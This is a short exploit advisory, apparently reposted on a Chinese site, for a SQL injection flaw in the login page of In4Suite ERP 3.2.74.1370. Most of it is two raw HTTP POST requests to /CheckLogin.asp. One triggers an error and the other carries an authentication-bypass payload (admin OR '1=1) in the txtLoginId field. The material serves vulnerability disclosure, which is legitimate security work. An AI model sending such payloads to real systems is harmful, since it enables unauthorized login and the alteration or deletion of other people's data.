# In4Suit ERP 3.2.74.1370 – ‘txtLoginId’ SQL注入漏洞
==EXP==
# Exploit Title: In4Suit ERP 3.2.74.1370 - 'txtLoginId' SQL injection # Date: 18/05/2021 # Exploit Author: Gulab Mondal # Vendor Homepage: https://www.in4velocity.com/in4suite-erp.html # Version: In4Suite ERP 3.2.74.1370 # Tested on: Windows ----------------------------------------- SQL injection in In4Suite ERP 3.2.74.1370 allows remote attackers to modify or delete data, causing persistent changes to the application's content or behavior by using malicious SQL queries. -------------- # Error condition POST /CheckLogin.asp HTTP/1.1 Host: 127.0.0.1 txtLoginId=admin&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" " # SQL Injection exploitation POST /CheckLogin.asp HTTP/1.1 Host: 127.0.0.1 txtLoginId=admin OR '1=1&txtpassword=test&cmbLogin=Login&hdnPwdEncrypt=" ------------------------------
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
请登录后查看评论内容